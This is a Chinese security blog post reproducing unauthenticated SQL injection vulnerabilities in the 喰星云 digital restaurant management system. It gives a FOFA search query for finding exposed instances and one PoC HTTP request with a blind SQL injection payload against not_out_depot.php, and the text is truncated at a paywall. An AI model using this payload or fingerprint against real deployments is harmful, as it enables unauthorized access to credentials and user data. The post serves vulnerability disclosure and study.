喰星云·数字化餐饮服务系统 多处 SQL注入漏洞复现

已于 2024-08-07 20:40:10 修改
阅读量2.2k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: sql 安全 web安全
于 2024-07-14 18:57:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/140420710
版权

0x01 产品简介

喰星云·数字化餐饮服务系统是一款专为餐饮企业设计的综合性管理软件,旨在通过信息化手段提升餐饮企业的运营效率、降低运营成本,并实现数据驱动的决策管理。该系统包括供应链管理、财务管理、巡店管理、人力资源管理等多个模块,可全面覆盖餐饮企业的日常运营需求。覆盖餐饮企业从采购、库存、销售到财务、人力资源等各个环节,实现一体化管理。

0x02 漏洞概述

喰星云·数字化餐饮服务系统 not_out_depot.php、shelflife.php、not_finish.php、stock.php、getlist、getlistdata等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:body="tmp_md5_pwd"

0x04 漏洞复现

PoC-1

GET /logistics/home_warning/php/not_out_depot.php?do=getList&lsid=(SELECT%20(CASE%20WHEN%20(5630=5631)%20THEN%202%20ELSE%20(SELECT%207330%20UNION%20SELECT%203010)%20END)) HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
Priority: u=0, i
U
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
星云·数字化餐饮服务系统 listuser 信息泄露漏洞复现
0xSec
06-20 280
星云·数字化餐饮服务系统 listuser 接口处存在信息泄露漏洞,未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码登录凭证信息,导致后台权限被控,造成信息泄露,使系统处于极不安全的状态。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 799
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
漏洞复现星云·数字化餐饮服务系统 多处 SQL注入漏洞
siu~
07-19 668
星云·数字化餐饮服务系统 not_out_depot.php、shelflife.php、not_finish.php、stock.php等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务系统权限。
HW漏洞威胁情报第七天|HW情报
weixin_43167326的博客
07-31 933
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
CSDN博客专家证书发放名单(已暂停)
热门推荐
CSDN 官方博客
07-12 5万+
博客专家专属奖励。
通用收费管理系统 星云通用收费管理系统 v1.0
11-10
星云通用收费管理系统 v1.0:提升效率与便捷性的综合解决方案》 在信息化日益普及的今天,收费管理...无论是在小型企业还是大型机构,星云通用收费管理系统 v1.0 都能成为优化财务管理、提升服务品质的理想工具。
网御漏洞扫描系统6071用户手册.pdf
08-26
《网御漏洞扫描系统6071用户手册》是一份详尽的指南,旨在帮助用户理解和操作网御科技的漏洞扫描系统。该系统是网络安全维护的重要工具,它能有效地检测网络中的安全漏洞,确保系统安全性。 1. **产品概述** 网...
网御星云安全集中管理系统用户使用手册.pdf
09-08
网御安全集中管理系统V3.0.7 用户使用手册
nebula:“星云”业务风控系统,主工程
03-11
星云(TH-Nebula)业务风控系统介绍: 简介: 星云风控系统是一套互联网风控分析和检测平台,可以对企业遇到的各种业务风险场景进行细致的分析,识别威胁流量,帮助用户减少损失。采集,无需在业务逻辑上做数据埋入...
Dav_笔记12:Automatic SQL Tuning 之 5 managing SQL Profiles
Dav_2099的博客
08-07 1099
SQL配置文件包含对自动SQL调整期间发现的较差优化程序估计值的更正。此信息可以改进优化器基数和选择性估计,从而导致优化器选择更好的计划。SQL配置文件不包含有关各个执行计划的信息。相反,优化程序在选择计划时具有以下信息源:■环境,包含数据库配置,绑定变量值,优化程序统计信息,数据集等■SQL配置文件中的补充统计信息如果环境或SQL配置文件发生更改,则优化程序可以创建新计划。您可以使用SQL配置文件,无论是否有SQL计划管理。如果使用SQL计划管理,则优化程序选择的计划必须是已启用的计划基准。
dbeaver 导入sql 报错,ERROR 2059 (HY000)
hyq_07_27的博客
08-07 251
ERROR 2059 (HY000): Authentication plugin ‘caching_sha2_password’ cannot be loaded: 鎵句笉鍒版寚瀹氱殑妯″潡銆�。下载后解压压缩包,点击“添加数据库地址”按钮,选择新的MySQL8的所在目录.再次导入就可以了。可以下载 MySQL免安装版配置教程mysql-8.0.39-winx64.zip。先mysql连接设置,查看一下dbeaver的mysql 版本,是5.5.62.版本问题,MySQL8之后更换了密码认证策略。
MyBatis 如何通过拦截器修改 SQL
Hello World
08-03 547
假如我们想实现多租户,或者在某些 SQL 后面自动拼接查询条件。在开发过程中大部分场景可能都是一个查询写一个 SQL 去处理,我们如果想修改最终 SQL 可以通过修改各个 mapper.xml 中的 SQL 来处理。但实际过程中我们可能穿插着 ORM 和 SQL 的混合使用,隐藏在代码中不容易被发现,还有假如项目中有很多很多的 SQL 我们不可能一个一个的去修改解决。这个时候我们就需要通过 mybatis 拦截 SQL 并且最终修改 SQL。实现Interceptor接口,并写相关逻辑。
达梦数据库(十) -------- mybatis-plus 整合达梦时,自动生成的 sql 语句报错
weixin_52466601的博客
08-09 451
问题原因:mybatis-plus 生成的 sql 语句字段是小写的,同时还包含数据库关键字。框架会默认加上(`)符号,该符号在达梦数据库中无法被识别,需要更换为 (")。方案二:修改实体类的字段名称避免使用达梦数据库关键字。
SQL进阶
m0_72009757的博客
08-07 1260
1 . m a x2 . m i n1 . c o u n t2 . s u m3 . a v g1 . 0 02 . 1 13 . 2 1 04 . 3 1 15 . 4 1 0 0只有 select ⼦句和 having ⼦句、order by ⼦句中能使⽤聚合函 数,where ⼦句不能使⽤聚合函数。当使⽤聚合查询以后,不能 使⽤where条件,如果要添加条件,就使⽤having(1)⽇期函数(2)数字函数(3)字符串函数语法:select 聚合函数(表头名 1),表头名 2 from 数据表名 gr
postgreSQL16添加审计功能
ciqingloveless的博客
08-07 203
他的分支版本支持不同的PGSQL按需下载。
NoSQL之Redis配置与优化
最新发布
weixin_63631452的博客
08-10 666
Redis (REmote DIctionary Server) 是一个开源的、高性能的键值存储系统。它支持多种数据结构,例如字符串、哈希、列表、集合、有序集合等。Redis 最初由 Salvatore Sanfilippo 在 2009 年开发,并且已经成为最流行的 NoSQL 数据库之一。Redis 不仅可以用作数据库,还可以用作缓存和消息中间件。主要特点内存存储:数据存储在内存中,这使得 Redis 能够实现非常快的数据访问速度。持久化。
星云服务器虚拟化:企业云数据中心的高效管理实践
首先,产品愿景强调了技术服务于客户的重要性,致力于虚拟化技术的专研并扩展周边生态系统。产品自2009年开始发展,经历了多个版本的迭代,如CC1.0到CC3.0,以及SG-VCS系列和StarVcenter1.0,显示出产品不断演进和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值